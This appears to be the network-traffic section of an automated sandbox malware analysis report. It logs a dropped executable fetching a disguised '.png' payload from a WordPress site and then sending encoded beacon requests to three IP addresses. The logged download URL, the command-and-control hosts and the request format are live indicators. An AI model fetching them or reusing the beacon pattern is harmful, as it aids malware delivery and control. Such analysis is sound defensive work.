Jan 12, 2023 12:11:41.553299904 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.553755999 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.553812027 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.553849936 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.553872108 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.553896904 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.553936958 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.554326057 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.554374933 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.554433107 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.554454088 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.554508924 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.554508924 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.554779053 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.554827929 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.554879904 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.554904938 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.554927111 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.554966927 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.555217028 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.555263996 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.555313110 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.555336952 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.555360079 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.555396080 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.664236069 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.664319038 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.664585114 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.664588928 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.664639950 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.664719105 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.664738894 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.664828062 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.664844990 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.664921045 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.665083885 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.665131092 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.665180922 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.665199041 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.665258884 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.665292978 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.665647984 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.665781975 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.666481972 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.666610956 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.666821003 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.666928053 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.666929960 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.666986942 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667017937 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667066097 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667201996 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667304039 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667340040 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667360067 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667409897 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667447090 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667550087 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667638063 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667649984 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667692900 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667726040 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667754889 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.667874098 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667967081 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.667979956 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668024063 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668061972 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668108940 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668164968 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668250084 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668265104 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668309927 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668339014 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668404102 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668656111 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668705940 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668797016 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668816090 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.668867111 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668914080 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.668994904 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.669090033 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.669110060 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.669194937 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.669219017 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.669316053 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.669863939 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.669926882 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.669982910 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670001984 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.670068979 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670104027 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670154095 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.670243979 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670526028 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670547962 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.670630932 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.670728922 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670749903 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.670802116 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.670866013 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671228886 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.671278954 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.671323061 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671344042 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.671374083 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671421051 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671539068 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671747923 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.671793938 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.671818018 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671838999 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671854973 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.671876907 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.671912909 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.672184944 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.672226906 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.672276974 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.672293901 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.672318935 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.672352076 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.672382116 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.672616959 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.672718048 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.672760010 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673356056 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673449039 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673630953 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673682928 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673716068 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673738956 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673768044 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673789978 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673839092 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673885107 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673922062 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673938990 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.673974037 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.673989058 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674079895 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674140930 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674164057 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674180984 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674215078 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674232006 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674273014 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674314976 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674359083 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674379110 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674401045 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674439907 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674468994 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674510956 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674550056 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674571037 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.674592018 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.674623966 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.783582926 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.783652067 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.783799887 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.783864021 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.783902884 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.783905029 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.783973932 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.783982038 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784018993 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784065008 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.784092903 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.784488916 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784540892 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784594059 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.784621954 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784648895 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.784668922 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.784789085 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784857035 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.784873962 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.784919977 CET	443	49695	174.142.60.54	192.168.2.4
Jan 12, 2023 12:11:41.788465023 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:11:41.799472094 CET	49695	443	192.168.2.4	174.142.60.54
Jan 12, 2023 12:14:17.946495056 CET	49696	80	192.168.2.4	62.173.149.202
Jan 12, 2023 12:14:18.008944988 CET	80	49696	62.173.149.202	192.168.2.4
Jan 12, 2023 12:14:18.009084940 CET	49696	80	192.168.2.4	62.173.149.202
Jan 12, 2023 12:14:18.009454966 CET	49696	80	192.168.2.4	62.173.149.202
Jan 12, 2023 12:14:18.071727991 CET	80	49696	62.173.149.202	192.168.2.4
Jan 12, 2023 12:14:18.072314024 CET	80	49696	62.173.149.202	192.168.2.4
Jan 12, 2023 12:14:18.072504997 CET	49696	80	192.168.2.4	62.173.149.202
Jan 12, 2023 12:14:18.073934078 CET	49696	80	192.168.2.4	62.173.149.202
Jan 12, 2023 12:14:18.136224985 CET	80	49696	62.173.149.202	192.168.2.4
Jan 12, 2023 12:14:38.122783899 CET	49697	80	192.168.2.4	31.41.44.158
Jan 12, 2023 12:14:38.183175087 CET	80	49697	31.41.44.158	192.168.2.4
Jan 12, 2023 12:14:38.185137987 CET	49697	80	192.168.2.4	31.41.44.158
Jan 12, 2023 12:14:38.185534954 CET	49697	80	192.168.2.4	31.41.44.158
Jan 12, 2023 12:14:38.246366024 CET	80	49697	31.41.44.158	192.168.2.4
Jan 12, 2023 12:14:38.246897936 CET	80	49697	31.41.44.158	192.168.2.4
Jan 12, 2023 12:14:38.248133898 CET	49697	80	192.168.2.4	31.41.44.158
Jan 12, 2023 12:14:38.251274109 CET	49697	80	192.168.2.4	31.41.44.158
Jan 12, 2023 12:14:38.310674906 CET	80	49697	31.41.44.158	192.168.2.4
Jan 12, 2023 12:14:58.298347950 CET	49698	80	192.168.2.4	193.0.178.157
Jan 12, 2023 12:14:58.327349901 CET	80	49698	193.0.178.157	192.168.2.4
Jan 12, 2023 12:14:58.327543974 CET	49698	80	192.168.2.4	193.0.178.157
Jan 12, 2023 12:14:58.327919960 CET	49698	80	192.168.2.4	193.0.178.157
Jan 12, 2023 12:14:58.356693983 CET	80	49698	193.0.178.157	192.168.2.4
Jan 12, 2023 12:14:58.357887030 CET	80	49698	193.0.178.157	192.168.2.4
Jan 12, 2023 12:14:58.359273911 CET	49698	80	192.168.2.4	193.0.178.157
Jan 12, 2023 12:14:58.359273911 CET	49698	80	192.168.2.4	193.0.178.157
Jan 12, 2023 12:14:58.664300919 CET	49698	80	192.168.2.4	193.0.178.157
Jan 12, 2023 12:14:58.693433046 CET	80	49698	193.0.178.157	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2023 12:11:40.489515066 CET	56572	53	192.168.2.4	8.8.8.8
Jan 12, 2023 12:11:40.509084940 CET	53	56572	8.8.8.8	192.168.2.4
Jan 12, 2023 12:12:57.817224979 CET	50911	53	192.168.2.4	8.8.8.8
Jan 12, 2023 12:12:57.837538004 CET	53	50911	8.8.8.8	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 12, 2023 12:11:40.489515066 CET	192.168.2.4	8.8.8.8	0x80b	Standard query (0)	christianbeltran.co	A (IP address)	IN (0x0001)	false
Jan 12, 2023 12:12:57.817224979 CET	192.168.2.4	8.8.8.8	0xa002	Standard query (0)	checklist.skype.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 12, 2023 12:11:40.509084940 CET	8.8.8.8	192.168.2.4	0x80b	No error (0)	christianbeltran.co		174.142.60.54	A (IP address)	IN (0x0001)	false
Jan 12, 2023 12:12:57.837538004 CET	8.8.8.8	192.168.2.4	0xa002	Name error (3)	checklist.skype.com	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

christianbeltran.co

62.173.149.202

31.41.44.158

193.0.178.157

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49695	174.142.60.54	443	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49696	62.173.149.202	80	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2023 12:14:18.009454966 CET	925	OUT	GET /drew/jHChKd_2FjBQ0IhBZb/5eUb4wlnJ/nNAqLlhkhlVL_2BEMNaO/fU1yD2cllcbT9iHTfpI/6H3bbK1eyqLaqlIY2TE5OB/0EJzuQaexEZcX/7fNH93_2/BPaD_2BE_2FjENdy4RFw7Ax/5wIB2h5UN_/2FRQ47MCK2MIF7ewb/8_2Fu3XthbQR/CPx2qHatKTD/YHT_2FrDgK83SJ/t3nFbWzQ9PsSm_2Fb3E2u/XDf1ma0rrcvNnpl1/ThfvvL6MGjuAWJC/PiXEIoZrVwPJmdlxug/dGZn9wbLf/wg1whEjmB/85umsLkj4az/T.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 62.173.149.202 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.4	49697	31.41.44.158	80	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2023 12:14:38.185534954 CET	926	OUT	GET /drew/OUUsBzpIZZUphm/Tsj7lOWVT01GR7_2B_2F3/h1YqNuP4WcrzeCJs/x51Rts0xb3FAs1_/2Bxw1CaQKlICTyuLN1/TaoUc8_2F/5TTXCIOA0SRbwyts6JTK/R5MlMx5IeVFFgmHEPpZ/TWM7GdLrJHM_2B3S8B1eU7/_2BBh5oB1R_2F/_2BxltWj/_2BLEoNYS3p4VDy7elM9qu2/U5PEBiMSrU/T6YOXvs_2FZLXPTA3/hObNStGHJyyy/hCCoXchnbdJ/ixUgp0U2WECwia/6eVsNKM8Cmg7_2F7HmThU/LsrExo0WJYro/O9pQu.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 31.41.44.158 Connection: Keep-Alive Cache-Control: no-cache

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.4	49698	193.0.178.157	80	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Timestamp	kBytes transferred	Direction	Data
Jan 12, 2023 12:14:58.327919960 CET	927	OUT	GET /drew/lGr5mrbDGs3py0IkX1xCdao/J_2BO3pveg/tEN51c8QgFcgipJDl/9B6bT37vHiCK/xeYTuAvP5ZA/n_2BT1EpLoFWJa/4mubDHfkDoaafTL29qqXs/Pr23musVKIKOk0xu/4mHeVX_2FY0FOLH/NMKX_2BVJj7BkC0dl6/T90V1bDM6/suQsVdE5n84CtWOe45Jz/zXcs4agZHeV5dnP4wZv/fQWwms1zkQgJ1jKz1zGBWe/F8C2u26K4tWR3/LoRQN_2B/eADxrRsvut3YtTrDMejjOLK/i3S1e0Ho1/08GsbQQc.jlk HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: 193.0.178.157 Connection: Keep-Alive Cache-Control: no-cache

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.4	49695	174.142.60.54	443	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe

Timestamp	kBytes transferred	Direction	Data
2023-01-12 11:11:40 UTC	0	OUT	GET /wp-admin/images/css/ground/bo/Zujiies.png HTTP/1.1 Host: christianbeltran.co Connection: Keep-Alive
2023-01-12 11:11:41 UTC	0	IN	HTTP/1.1 200 OK Connection: close cache-control: public, max-age=604800 expires: Thu, 19 Jan 2023 11:11:41 GMT content-type: image/png last-modified: Thu, 12 Jan 2023 09:22:23 GMT accept-ranges: bytes content-length: 824832 date: Thu, 12 Jan 2023 11:11:41 GMT server: LiteSpeed
2023-01-12 11:11:41 UTC	0	IN	Data Raw: 19 38 e1 77 76 72 64 6d 77 6e 77 68 8e 8b 75 66 cf 66 62 79 6a 6a 75 6b 14 62 71 77 75 72 64 6d 73 6e 77 68 71 74 75 66 77 66 62 79 6a 6a 75 6b 54 62 71 77 75 72 64 6d 73 6e 77 68 f1 74 75 66 79 79 d8 77 6a de 7c a6 75 da 70 3b b8 53 30 05 1a 1d 57 18 03 1b 12 14 16 0b 42 1a 0b 04 1b 04 20 42 13 12 55 00 11 03 53 07 19 48 35 3b 26 46 1a 09 06 1c 44 67 78 61 70 62 71 77 75 72 64 6d 23 2b 77 68 3d 75 76 66 4f b7 dd 1a 6a 6a 75 6b 54 62 71 77 95 72 6a 4c 78 6f 71 68 71 fa 79 66 77 60 62 79 6a 6a 75 6b 7a ce 7d 77 75 52 64 6d 73 ae 7b 68 71 74 35 66 77 46 62 79 6a 68 75 6b 50 62 71 77 75 72 64 6d 77 6e 77 68 71 74 75 66 77 66 6f 79 6a 68 75 6b 54 62 71 77 76 72 24 e8 73 6e 67 68 71 64 75 66 77 66 72 79 6a 7a 75 6b 54 62 71 77 65 72 64 6d 73 6e 77 68 71 74 75 Data Ascii: 8wvrdmwnwhuffbyjjukbqwurdmsnwhqtufwfbyjjukTbqwurdmsnwhtufyywj\|up;S0WB BUSH5;&FDgxapbqwurdm#+wh=uvfOjjukTbqwrjLxoqhqyfw`byjjukz}wuRdms{hqt5fwFbyjhukPbqwurdmwnwhqtufwfoyjhukTbqwvr$snghqdufwfryjzukTbqwerdmsnwhqtu
2023-01-12 11:11:41 UTC	16	IN	Data Raw: 18 65 62 7d 42 5f 72 6b 52 7d 7c 18 58 72 64 67 6a 54 71 68 71 74 53 5e 7d 66 62 79 ea 5e 75 6b 50 5a 71 77 75 72 4e 6d e1 10 2d 6b 71 70 5d 87 71 66 64 7b 74 7d 4f 60 54 62 71 51 5d 76 64 6d 75 56 71 68 71 74 53 5e 87 99 9d 86 40 6a 75 6b 3e 60 69 61 4c 79 64 6d 73 48 0c 5d 71 74 71 5e 71 66 62 79 4c 52 85 94 ab 9d 5b 77 1f 70 67 74 49 69 77 68 71 52 53 5e 7d 66 62 79 17 5f 75 6b 50 5a 71 77 75 72 4e 6d 79 77 5d 68 72 44 71 66 e9 66 62 79 6a 6a 75 6b 2a 38 72 77 71 5a 85 6b 73 68 75 40 7d 74 75 6c 74 5c 64 79 6a 6a 06 45 54 62 7b 0d 76 0c 99 6e 73 6a 5f 05 78 74 73 5f 71 66 62 79 19 78 75 6b 5e 18 73 74 60 48 21 6d 73 6e 51 4e 73 77 0b 98 74 66 66 51 1b 63 75 6d d9 7b 71 77 74 6b 5e 5b 73 6e 77 4e 57 76 77 18 88 65 62 7d 42 1f 7c 6b 52 7e 4b 5b 75 72 64 Data Ascii: eb}B_rkR}\|XrdgjTqhqtS^}fby^ukPZqwurNm-kqp]qfd{t}O`TbqQ]vdmuVqhqtS^@juk>`iaLydmsH]qtq^qfbyLR[wpgtIiwhqRS^}fby_ukPZqwurNmyw]hrDqffbyjjuk*8rwqZkshu@}tult\dyjjETb{vnsj_xts_qfbyxuk^st`H!msnQNswtffQcum{qwtk^[snwNWvweb}B\|kR~K[urd
2023-01-12 11:11:41 UTC	32	IN	Data Raw: 70 6e 73 40 40 7d 75 60 4d 64 62 79 6a 7c 5f 69 2a 8d 72 77 71 5a 51 64 73 68 74 16 9e 77 75 62 5f 53 6b 79 6c 51 77 6b 54 62 67 5d 77 0c 88 6e 73 6a 5f 41 78 74 73 65 09 8a 61 79 6e 42 5c 62 54 64 75 09 03 76 64 69 5b 3f 7c 68 77 5e 76 18 99 65 62 7d 42 5b 7c 6b 52 5b 73 77 75 72 72 47 71 10 9e 6b 71 70 5d 7b 7e 66 64 7a 14 83 76 6b 50 4a 6c 7e 75 74 5f 6f 73 6e 77 7e 5b 76 0b 8f 74 66 66 51 77 63 75 6d 6d 98 71 77 75 70 1a 87 70 6e 73 40 50 7d 75 60 4d 76 62 79 6a 68 0b 80 57 62 75 5f 50 7b 64 6b 4b 6f 77 68 71 76 76 18 9d 65 62 7d 42 4b 7c 6b 52 58 61 77 75 72 67 13 98 6d 77 6c 59 51 7c 66 71 5e 63 79 6a 6a 76 7e 6e 6e 71 77 75 54 62 56 7e 6e 77 68 49 72 75 66 77 6c 5a 96 95 95 8a 7d 7e 60 0f 00 71 72 60 45 26 65 77 6e 66 4e 56 66 77 66 44 7a 14 1d 71 Data Ascii: pns@@}u`Mdbyj\|_i*rwqZQdshtwub_SkylQwkTbg]wnsj_AxtseaynB\bTduvdi[?\|hw^veb}B[\|kR[swurrGqkqp]{~fdzvkPJl~ut_osnw~[vtffQwcummqwuppns@P}u`MvbyjhWbu_P{dkKowhqvveb}BK\|kRXawurgmwlYQ\|fq^cyjjv~nnqwuTbV~nwhIrufwlZ}~`qr`E&ewnfNVfwfDzq
